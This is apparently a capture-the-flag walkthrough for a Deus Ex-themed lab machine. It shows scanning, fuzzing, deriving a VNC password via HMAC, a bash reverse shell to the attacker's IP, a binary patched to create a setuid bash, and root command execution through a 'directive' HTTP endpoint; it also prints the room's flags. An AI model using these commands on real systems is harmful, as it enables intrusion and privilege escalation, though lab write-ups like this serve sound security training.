DX1 Liberty Island
Compromise the UNATCO server
Start Machine
The NSF are about to raid Liberty Island to capture the shipment of Ambrosia from UNATCO (The United Nations Anti-Terrorist Coalition). As our top hacker, we need you to gain a root foothold on the UNATCO admin network.
Warning: Don't try to brute force auth - the services in question don't like this.
Answer the questions below
┌──(kali㉿kali)-[~/nappy/DX1]
└─$ rustscan -a 10.10.179.68 --ulimit 5500 -b 65535 -- -A -Pn
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Real hackers hack time ⌛
[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[~] Automatically increasing ulimit value to 5500.
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
Open 10.10.179.68:80
Open 10.10.179.68:5901
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
[~] Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-13 18:06 EST
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 18:06
Completed NSE at 18:06, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 18:06
Completed NSE at 18:06, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 18:06
Completed NSE at 18:06, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 18:06
Completed Parallel DNS resolution of 1 host. at 18:06, 0.02s elapsed
DNS resolution of 1 IPs took 0.03s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 18:06
Scanning 10.10.179.68 [2 ports]
Discovered open port 80/tcp on 10.10.179.68
Discovered open port 5901/tcp on 10.10.179.68
Completed Connect Scan at 18:06, 0.19s elapsed (2 total ports)
Initiating Service scan at 18:06
Scanning 2 services on 10.10.179.68
Completed Service scan at 18:06, 6.39s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.179.68.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 18:06
Completed NSE at 18:06, 5.62s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 18:06
Completed NSE at 18:06, 1.61s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 18:06
Completed NSE at 18:06, 0.00s elapsed
Nmap scan report for 10.10.179.68
Host is up, received user-set (0.19s latency).
Scanned at 2023-01-13 18:06:45 EST for 14s
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 2 disallowed entries
|_/datacubes *
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: United Nations Anti-Terrorist Coalition
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
5901/tcp open vnc syn-ack VNC (protocol 3.8)
| vnc-info:
| Protocol version: 3.8
| Security types:
| VeNCrypt (19)
| VNC Authentication (2)
| VeNCrypt auth subtypes:
| Unknown security type (2)
|_ VNC auth, Anonymous TLS (258)
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 18:06
Completed NSE at 18:06, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 18:06
Completed NSE at 18:06, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 18:06
Completed NSE at 18:06, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.88 seconds
┌──(kali㉿kali)-[~/nappy/DX1]
└─$ gobuster dir -u http://10.10.179.68 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -k -x txt,php,py,html
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.179.68
[+] Method: GET
[+] Threads: 64
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: html,txt,php,py
[+] Timeout: 10s
===============================================================
2023/01/13 18:08:15 Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 277]
/index.html (Status: 200) [Size: 909]
/terrorism.html (Status: 200) [Size: 5939]
/robots.txt (Status: 200) [Size: 95]
/threats.html (Status: 200) [Size: 4140]
Progress: 72285 / 1102805 (6.55%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2023/01/13 18:12:25 Finished
===============================================================
http://10.10.179.68/terrorism.html#freedom
Stopping Terror - A New Perspective on Freedom
When one maniac can wipe out a city of twenty million with a microbe developed in his basement, a new approach to law enforcement becomes necessary. Every citizen of the world must be placed under surveillance. That means sky-cams at every intersection, computer-mediated analysis of every phone call, e-mail, and snail-mail, and a purely electronic economy in which every transaction is recorded and data-mined for suspicious activity.
We are close to achieving this goal. Some would say that human liberty has been compromised, but the reality is just the opposite. As surveillance expands, people become free from danger, free to walk alone at night, free to work in a safe place, and free to buy any legal product or service without the threat of fraud. One day every man and woman will quietly earn credits, purchase items for quiet homes on quiet streets, have cook-outs with neighbors and strangers alike, and sleep with doors and windows wide open. If that isn't the tranquil dream of every free civilization throughout history, what is?
- Anna Navarre, Agent, UNATCO
http://10.10.179.68/threats.html
Know Your Enemy - The Triads
UNATCO surveillance of Hong Kong is currently a high priority given the renewed threat of Chinese organized crime in the form of the Triads. Despite being a model of prosperity and technological leadership for decades, Hong Kong persists as a haven for organized crime. The Triads, namely the Luminous Path and Red Arrow, vie for control of the ten-trillion credit shipping business, much of which supplies greater Asia with pirated technology, illegal drugs, and weapons.
Most disturbing of all, the Triads preach an ethic of technopiracy that has found enthusiastic support among small shopkeepers and businessmen who often aid the gangsters and buy their bootlegged software. Gullible and greedy, this army of middlemen remain insensitive to how their violations of intellectual property and copyright laws damage the global information economy.
view-source:http://10.10.179.68/badactors.html
<h1>War in Cyberspace</h1>
<div>Current Cyber Watchlist</div>
</header>
<div>
<h2>Vigilance Online</h2>
<p>As part of its duties, UNATCO monitors the digital domain as well as the physical, keeping track of those malevolent actors who would use their technical aptitude to threaten security and harm the peace-loving peoples of the world.</p>
<p>This page keeps a list of usernames that have been flagged by our sophisticated monitoring systems. If you see anyone in this list during your own travels online, be warned! You may be dealing with a cyberterrorist.
</div>
<div>
<iframe src="badactors.txt"></iframe>
</div>
<footer>
List is maintained by system admin, AJacobson//UNATCO.00013.76490
</footer>
<!-- if you can see this I might add you to the list. per United Nations directive #17, F12 is now a international cyber crime -->
view-source:http://10.10.179.68/badactors.txt
┌──(kali㉿kali)-[~/nappy/DX1]
└─$ cat badactors
apriest
aquinas_nz
cookiecat
craks
curley
darkmattermatt
etodd
gfoyle
grank
gsyme
haz
hgrimaldi
hhall
hquinnzell
infosneknz
jallred
jhearst
jlebedev
jooleeah
juannsf
killer_andrew
lachland
leesh
levelbeam
mattypattatty
memn0ps
nhas
notsus
oenzian
roseycross
sjasperson
sweetcharity
tfrase
thom_seven
ttong
view-source:http://10.10.179.68/robots.txt
# Disallow: /datacubes # why just block this? no corp should crawl our stuff - alex
Disallow: *
http://10.10.179.68/datacubes/0000/
Liberty Island Datapads Archive
All credentials within *should* be [redacted] - alert the administrators immediately if any are found that are 'clear text'
Access granted to personnel with clearance of Domination/5F or higher only.
http://10.10.179.68/datacubes/0011/
attention nightshift:
van camera system login (same as old login): [redacted]
new password: [redacted]
PS) we *will* beat you at darts on saturday, suckas.
let's use burp intruder
Intercept/Payload number From 0 to 9 Step 1
GET /datacubes/000§§/ HTTP/1.1
searching by length like 526 and the others 454(0000)
now from 10 to 99 step 1
GET /datacubes/00§§/ HTTP/1.1
search by status 200 or length (0011, 0068)
http://10.10.179.68/datacubes/0011/
attention nightshift:
van camera system login (same as old login): [redacted]
new password: [redacted]
PS) we *will* beat you at darts on saturday, suckas.
http://10.10.179.68/datacubes/0068/
So many people use that ATM each day that it's busted 90% of the time. But if it's working, you might need some cash today for the pub crawl we've got planned in the city. Don't let the tourists get you down. See you there tonight, sweetie.
Accnt#: [redacted]
PIN#: [redacted]
Johnathan - your husband to be.
PS) I was serious last night-I really want to get married in the Statue. We met there on duty and all our friends work there.
now from 100 to 999 step 1
GET /datacubes/0§§/ HTTP/
search by status 200 (0103, 0233, 0451)
http://10.10.179.68/datacubes/0103/
Change ghermann password to [redacted]. Next week I guess it'll be [redacted]. Strange guy...
http://10.10.179.68/datacubes/0233/
From: Data Administration
To: Maintenance
Please change the entry codes on the east hatch to [redacted].
NOTE: This datacube should be erased immediately upon completion.
http://10.10.179.68/datacubes/0451/
Brother,
I've set up VNC on this machine under jacobson's account. We don't know his loyalty, but should assume hostile.
Problem is he's good - no doubt he'll find it... a hasty defense, but since we won't be here long, it should work.
The VNC login is the following message, 'smashthestate', hmac'ed with my username from the 'bad actors' list (lol).
Use md5 for the hmac hashing algo. The first 8 characters of the final hash is the VNC password. - JL
from 1000 to 9999 (let's see) I'm using burp pro
GET /datacubes/§§/ HTTP/1.1
nothing...
Keyed-Hash Message Authentication Codes (**HMAC**) are a mechanism for message authentication using cryptographic hash functions.
string: smashthestate
┌──(kali㉿kali)-[~/nappy/DX1]
└─$ cat badactors | grep jl
jlebedev
key: jlebedev (UTF8)
hash:md5
311781a1830c1332a903920a59eb6d7a
311781a1 (pass)
or maybe using seq to generate a wordlist
The command you provided is used to create a wordlist containing a sequence of numbers.
- `seq` is a command used to generate a sequence of numbers.
- `-w` option is used to pad the numbers with leading zeroes. So, `-w 0000` means that the numbers will be 4 digits long and padded with leading zeroes as necessary.
- `9999` is the last number in the sequence.
- `>` is used to redirect the output of the command to a file. In this case, the output of the `seq` command is being saved to a file called "wordlist".
┌──(kali㉿kali)-[~/nappy/DX1]
└─$ seq -w 0000 9999 > wordlist
┌──(kali㉿kali)-[~/nappy/DX1]
└─$ gobuster dir -u http://10.10.37.31/datacubes/ -w wordlist -t 64 -k -x txt,php,py,html
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.37.31/datacubes/
[+] Method: GET
[+] Threads: 64
[+] Wordlist: wordlist
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: txt,php,py,html
[+] Timeout: 10s
===============================================================
2023/01/13 21:34:12 Starting gobuster in directory enumeration mode
===============================================================
/0011 (Status: 301) [Size: 319] [--> http://10.10.37.31/datacubes/0011/]
/0000 (Status: 301) [Size: 319] [--> http://10.10.37.31/datacubes/0000/]
/0068 (Status: 301) [Size: 319] [--> http://10.10.37.31/datacubes/0068/]
/0103 (Status: 301) [Size: 319] [--> http://10.10.37.31/datacubes/0103/]
/0233 (Status: 301) [Size: 319] [--> http://10.10.37.31/datacubes/0233/]
/0451 (Status: 301) [Size: 319] [--> http://10.10.37.31/datacubes/0451/]
:)
or maybe crunch
`crunch` is a command line tool that can be used to generate a wordlist of custom character sets and lengths. You can generate the same wordlist using crunch using the following command:
`crunch 4 4 0123456789 -o wordlist2`
- `4` is the minimum length of the generated words.
- `4` is the maximum length of the generated words.
- `0123456789` is the character set used for generating words.
- `-o` is used to specify the output file.
This command will generate a wordlist containing all 4-digit numbers consisting of the digits 0-9 and save the output to a file called "wordlist". As before, this wordlist could be used for cracking passwords, the same logic applies here.
┌──(kali㉿kali)-[~/nappy/DX1]
└─$ crunch 4 4 0123456789 -o wordlist2
Crunch will now generate the following amount of data: 50000 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 10000
crunch: 100% completed generating output
┌──(kali㉿kali)-[~/nappy/DX1]
└─$ gobuster dir -u http://10.10.37.31/datacubes/ -w wordlist2 -t 64 -k -x txt,php,py,html
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.37.31/datacubes/
[+] Method: GET
[+] Threads: 64
[+] Wordlist: wordlist2
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: py,html,txt,php
[+] Timeout: 10s
===============================================================
2023/01/13 21:36:53 Starting gobuster in directory enumeration mode
===============================================================
/0000 (Status: 301) [Size: 319] [--> http://10.10.37.31/datacubes/0000/]
/0011 (Status: 301) [Size: 319] [--> http://10.10.37.31/datacubes/0011/]
/0068 (Status: 301) [Size: 319] [--> http://10.10.37.31/datacubes/0068/]
/0103 (Status: 301) [Size: 319] [--> http://10.10.37.31/datacubes/0103/]
/0233 (Status: 301) [Size: 319] [--> http://10.10.37.31/datacubes/0233/]
/0451 (Status: 301) [Size: 319] [--> http://10.10.37.31/datacubes/0451/]
Progress: 2836 / 50005 (5.67%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2023/01/13 21:37:03 Finished
===============================================================
---
using remmina to connect (VNC : 10.10.179.68:5901) and enter pass
open user.txt
From: JManderley//UNATCO.00013.76490
To: AJacobson//UNATCO.00013.76490
Subject: re: Security Breach
Thank you for keeping me informed of the recent hacker activity and your speedy
response to same. I'm glad our security efforts were up to snuff.
(AJacobson//UNATCO.00013.76490) wrote:
>I managed to stop the guys (actually, it was some French chick
>the CIA's been watching, perhaps a Silhouette spy(?)) trying to
>break into the net, but I took the liberty of changing some
>passwords, just in case. Here are the new ones:
>
> thm{6ae787a98fff512ae33335e1264f0dd3}
>
>You should probably delete this as soon as you're done reading, okay?
Microsoft(R) Windows 95
(C)Copyright Microsoft Corp 1981-1996.
C:\> ls
bin dev home lib32 libx32 media opt root sbin srv tmp var
boot etc lib lib64 lost+found mnt proc run snap sys usr
C:\> cd home
C:\home> ls
ajacobson
C:\home> cd ajacobson/
C:\home\ajacobson> ls
Desktop Documents Downloads Music Pictures Public snap Templates Videos
C:\home\ajacobson> cd Desktop/
C:\home\ajacobson\Desktop> ls
badactors-list user.txt
C:\home\ajacobson\Desktop> ls -lah
total 6.7M
drwxr-xr-x 2 ajacobson ajacobson 4.0K Oct 22 05:36 .
drwxr-xr-x 20 ajacobson ajacobson 4.0K Jan 14 00:15 ..
-rwxr-xr-x 1 ajacobson ajacobson 6.7M Oct 22 05:36 badactors-list
-rw-r--r-- 1 ajacobson ajacobson 643 Oct 22 14:08 user.txt
C:\home\ajacobson\Desktop> file badactors-list
badactors-list: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=c9bf588974cd2b3b7c2db34d49d3df7aec3a76dc, for GNU/Linux 3.2.0, not stripped
revshell
C:\home\ajacobson\Desktop> bash -i >& /dev/tcp/10.8.19.103/1337 0>&1
┌──(kali㉿kali)-[~/nappy/DX1]
└─$ rlwrap nc -lvnp 1337
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::1337
Ncat: Listening on 0.0.0.0:1337
Ncat: Connection from 10.10.37.31.
Ncat: Connection from 10.10.37.31:52068.
Microsoft(R) Windows 95
(C)Copyright Microsoft Corp 1981-1996.
C:\home\ajacobson\Desktop> python3 -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
Microsoft(R) Windows 95
(C)Copyright Microsoft Corp 1981-1996.
C:\home\ajacobson\Desktop>
zsh: suspended rlwrap nc -lvnp 1337
┌──(kali㉿kali)-[~/nappy/DX1]
└─$ stty raw -echo; fg
[1] + continued rlwrap nc -lvnp 1337
C:\home\ajacobson\Desktop> export TERM=xterm-256color
export TERM=xterm-256color
C:\home\ajacobson\Desktop> python3 -m http.server 8000
python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.8.19.103 - - [14/Jan/2023 00:25:17] "GET /badactors-list HTTP/1.1" 200 -
┌──(kali㉿kali)-[~/nappy/DX1]
└─$ wget http://10.10.37.31:8000/badactors-list
--2023-01-13 19:25:16-- http://10.10.37.31:8000/badactors-list
Connecting to 10.10.37.31:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 6941856 (6.6M) [application/octet-stream]
Saving to: ‘badactors-list’
badactors-list 100%[==============================================================>] 6.62M 1.22MB/s in 9.0s
2023-01-13 19:25:26 (752 KB/s) - ‘badactors-list’ saved [6941856/6941856]
┌──(kali㉿kali)-[~/nappy/DX1]
└─$ chmod +x badactors-list
┌──(kali㉿kali)-[~/nappy/DX1]
└─$ ls
badactors badactors-list
┌──(kali㉿kali)-[~/nappy/DX1]
└─$ ./badactors-list
Overriding existing handler for signal 10. Set JSC_SIGNAL_FOR_GC if you want WebKit to use a different signal
2023/01/13 19:26:09 Post "http://UNATCO:23023": dial tcp: no such host
adding to /etc/host
┌──(kali㉿kali)-[~/nappy/DX1]
└─$ sudo nano /etc/hosts
[sudo] password for kali:
┌──(kali㉿kali)-[~/nappy/DX1]
└─$ tail /etc/hosts
10.10.11.180 mattermost.shoppy.htb
10.10.20.190 windcorp.thm
10.10.148.212 fire.windcorp.thm
10.10.85.102 selfservice.windcorp.thm
10.10.85.102 selfservice.dev.windcorp.thm
10.10.167.117 team.thm
10.10.167.117 dev.team.thm
10.10.29.100 set.windcorp.thm
10.10.20.190 Osiris.windcorp.thm Osiris osiris.windcorp.thm
10.10.37.31 UNATCO
there's an app (list of badactors)
┌──(kali㉿kali)-[~/nappy/DX1]
└─$ strings badactors-list | less
The `less` command is a command line utility used to view the contents of a text file one page at a time. To search within a file being viewed with `less`, use the forward slash (/) followed by the search term and press enter. To search for the next occurrence of the term, press n. To search for the previous occurrence, press Shift+n. To exit the search and return to normal navigation, press q.
Example:
Copy code
`less file.txt /search_term`
so searching
/badactor
incoming valuescat /var/www/html/badactors.txtcheckmark found unmarked
/base64
may contain pointersecho %s | base64 -d > /var/www/html/badactors.txt
so let's replace this
base64 -d > /var/www/html/badactors.txt
but first check length
┌──(kali㉿kali)-[~]
└─$ python3
Python 3.10.9 (main, Dec 7 2022, 13:47:07) [GCC 12.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> len("base64 -d > /var/www/html/badactors.txt")
39
to
cp /bin/bash /tmp/w && chmod +s /tmp/w
┌──(kali㉿kali)-[~]
└─$ python3
Python 3.10.9 (main, Dec 7 2022, 13:47:07) [GCC 12.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> len("cp /bin/bash /tmp/w && chmod +s /tmp/w")
39
now replace it (ctrl + w to search in nano.. search base64 then replace)
┌──(kali㉿kali)-[~/nappy/DX1]
└─$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.37.31 - - [13/Jan/2023 19:49:57] "GET /badactors-list HTTP/1.1" 200 -
C:\home\ajacobson\Desktop> cd /tmp
cd /tmp
C:\tmp> wget http://10.8.19.103:8000/badactors-list
wget http://10.8.19.103:8000/badactors-list
--2023-01-14 00:49:58-- http://10.8.19.103:8000/badactors-list
Connecting to 10.8.19.103:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 6941535 (6.6M) [application/octet-stream]
Saving to: ‘badactors-list’
badactors-list 100%[===================>] 6.62M 1.06MB/s in 8.4s
2023-01-14 00:50:06 (810 KB/s) - ‘badactors-list’ saved [6941535/6941535]
C:\tmp> chmod 777 badactors-list
chmod 777 badactors-list
C:\tmp> ls
ls
badactors-list
pulse-PKdhtXMmr18n
snap.lxd
ssh-qoTedSNcOwt2
systemd-private-48215323ef2a41eeab7bfd3cb0740100-apache2.service-KlE7Yg
systemd-private-48215323ef2a41eeab7bfd3cb0740100-colord.service-bsowPh
systemd-private-48215323ef2a41eeab7bfd3cb0740100-ModemManager.service-UxUWkh
systemd-private-48215323ef2a41eeab7bfd3cb0740100-switcheroo-control.service-wDAsSh
systemd-private-48215323ef2a41eeab7bfd3cb0740100-systemd-logind.service-DSmuyi
systemd-private-48215323ef2a41eeab7bfd3cb0740100-systemd-resolved.service-ae84rj
systemd-private-48215323ef2a41eeab7bfd3cb0740100-systemd-timesyncd.service-KX6o8e
systemd-private-48215323ef2a41eeab7bfd3cb0740100-upower.service-QRShUg
C:\tmp> ./badactors-list
./badactors-list
Segmentation fault (core dumped)
uhmm not work
let's do another method
http://unatco:23023/
UNATCO Liberty Island - Command/Control
RESTRICTED: ANGEL/OA
send a directive to process
using wireshark then curl
start eth0
┌──(kali㉿kali)-[~/nappy/DX1]
└─$ ./badactors-list
Overriding existing handler for signal 10. Set JSC_SIGNAL_FOR_GC if you want WebKit to use a different signal
write a badactor like witty then update
search http and follow tcp
POST / HTTP/1.1
Host: UNATCO:23023
User-Agent: Go-http-client/1.1
Content-Length: 49
Clearance-Code: 7gFfT74scCgzMqW4EQbu
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
directive=cat+%2Fvar%2Fwww%2Fhtml%2Fbadactors.txtHTTP/1.1 202 Accepted
Access-Control-Allow-Origin: *
Content-Type: text/plain
Date: Sat, 14 Jan 2023 01:19:48 GMT
Content-Length: 305
apriest
aquinas_nz
cookiecat
Clearance-Code: 7gFfT74scCgzMqW4EQbu
"Clearance-Code" is not a standard HTTP header and its purpose is likely specific to the application or service that the command is communicating with. It may be used as a means of authentication or authorization, where the code included in the header is checked against a database or other source of truth to confirm the client making the request is authorized to do so.
In this context, "directive" is likely a specific key or parameter used to indicate the specific action or command that the client (the user running the cURL command) wants the server to perform. The value "whoami" is passed as the value of the "directive" parameter in the command you provided.
It could be a parameter that tells the server what to do, so it could be different depending on the value passed on it. The value "whoami" is a command that is commonly used to find out the current logged in user name. This parameter is used to instruct the server to process that specific command, this way the developer can have one endpoint to handle multiple commands.
or
Microsoft(R) Windows 95
(C)Copyright Microsoft Corp 1981-1996.
C:\> export http_proxy=localhost:4444
C:\> cd /home
C:\home> ls
ajacobson
C:\home> cd ajacobson/
C:\home\ajacobson> cd Desktop/
C:\home\ajacobson\Desktop> ls
badactors-list user.txt
C:\home\ajacobson\Desktop> ./badactors-list
Overriding existing handler for signal 10. Set JSC_SIGNAL_FOR_GC if you want WebKit to use a different signal
Microsoft(R) Windows 95
(C)Copyright Microsoft Corp 1981-1996.
C:\> nc -lnvp 4444
Listening on 0.0.0.0 4444
Connection received on 127.0.0.1 47596
POST http://UNATCO:23023/ HTTP/1.1
Host: UNATCO:23023
User-Agent: Go-http-client/1.1
Content-Length: 49
Clearance-Code: 7gFfT74scCgzMqW4EQbu
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
directive=cat+%2Fvar%2Fwww%2Fhtml%2Fbadactors.txt
┌──(kali㉿kali)-[~/nappy]
└─$ curl -XPOST -H 'Clearance-Code: 7gFfT74scCgzMqW4EQbu' -d 'directive=whoami' UNATCO:23023
root
┌──(kali㉿kali)-[~/nappy]
└─$ curl -XPOST -H 'Clearance-Code: 7gFfT74scCgzMqW4EQbu' -d 'directive=cat+/root/root.txt' UNATCO:23023
From: AJacobson//UNATCO.00013.76490
To: JCDenton//UNATCO.82098.9868
Subject: Come by my office
We need to talk about that last mission. In person, not infolink. Come by my
office after you've been debriefed by Manderley.
thm{985bb3c88bfe66f9b465b00198692866}
-alex-
What is the User flag?
If you get locked out, restart either the target or your attack box for a new IP.
thm{6ae787a98fff512ae33335e1264f0dd3}
What is the Root flag?
thm{985bb3c88bfe66f9b465b00198692866}
Credits
The theme used for XFCE is https://github.com/grassmunk/Chicago95 which is excellent! Thanks to my beta testers (Voy, memN0ps and sootierr). Thanks to https://nuwen.net/dx.html a compiled Deus Ex text resource by the excellent Stephan T. Lavavej. And thanks to all of you!
Answer the questions below
Thanks!
[[Brute]]
Last updated
